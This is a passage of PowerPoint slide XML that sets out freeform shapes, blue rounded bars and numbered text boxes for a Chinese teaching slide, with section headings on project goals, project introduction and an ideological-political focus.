        <p:nvSpPr>
          <p:cNvPr id="112" name="Freeform 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="1620900"/>
            <a:ext cx="596265" cy="562610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="562610">
                <a:moveTo>
                  <a:pt x="596011" y="288036"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="590887" y="346757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575500" y="399478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549826" y="446198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513842" y="486918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479062" y="514013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440551" y="535098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398298" y="550167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352289" y="559212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302513" y="562228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250668" y="559102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202883" y="549715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159163" y="534056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119516" y="512111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83947" y="483870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53709" y="450615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30202" y="413483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13419" y="372468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3353" y="327564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="278764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3247" y="231032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992" y="187042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29242" y="146789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52002" y="110267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81280" y="77470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115677" y="49613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153800" y="27925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195653" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241243" y="3106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290575" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342741" y="3168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390877" y="12671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434978" y="28501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475036" y="50653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511048" y="79121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541634" y="112771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565424" y="150482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582416" y="192259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592612" y="238108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="288036"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Freeform 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="1011300"/>
            <a:ext cx="596265" cy="447675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="447675">
                <a:moveTo>
                  <a:pt x="596011" y="305943"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="594651" y="346424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590565" y="383476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583741" y="417099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574167" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455422" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470423" y="417095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481139" y="384968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487568" y="350889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="489712" y="314833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486332" y="274734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459333" y="207158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406689" y="157608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336117" y="132324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294639" y="129159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254323" y="132159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186072" y="156162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135518" y="203285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109662" y="268194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106425" y="306959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108757" y="344656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115744" y="380603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127375" y="414811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143637" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30861" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17359" y="413458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7715" y="374824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1928" y="331404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="283210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3123" y="233251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12488" y="187608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28090" y="146269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49922" y="109222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77978" y="76453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111217" y="48946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148608" y="27541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190156" y="12244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235868" y="3062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285750" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338389" y="3426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="387043" y="13699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431715" y="30806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472413" y="54733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="509143" y="85471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540415" y="121604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564738" y="161723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582112" y="205824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592536" y="253899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="305943"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="990600"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="1066800"/>
            <a:ext cx="1781175" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>项目目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="AutoShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="971486"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">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17" name="TextBox 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="1046797"/>
            <a:ext cx="176530" cy="334645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" spc="15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" spc="15">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118" name="AutoShape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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19" name="Freeform 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="1828800"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="TextBox 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="1905000"/>
            <a:ext cx="2886075" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>项目导入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="AutoShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="1809686"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">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22" name="TextBox 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="1884997"/>
            <a:ext cx="176530" cy="323215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="200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rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Freeform 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="2743200"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
                  <a:pt x="3819525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="228600" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4644" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17966" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39045" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66960" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100793" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139624" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182533" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228600" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="457200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="452555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="439233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="418154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="390239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="356406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="317575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="274666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4048125" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4043480" y="182533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4030158" y="139624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4009079" y="100793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3981164" y="66960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3947331" y="39045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908500" y="17966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3865591" y="4644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3819525" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="TextBox 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143500" y="2819400"/>
            <a:ext cx="3733800" cy="339757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="195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rPr>
              <a:t>思政聚焦</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="195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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="AutoShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4350226" y="2724086"/>
            <a:ext cx="509587" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill dpi="0" rotWithShape="0">
            <a:blip r:embed="rId8">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26" name="TextBox 126"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4516754" y="2799397"/>
            <a:ext cx="176530" cy="323215"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="15907" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="200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rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="200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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Freeform 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4914900" y="3543935"/>
            <a:ext cx="4048125" cy="457200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4048125" h="457200">
                <a:moveTo>
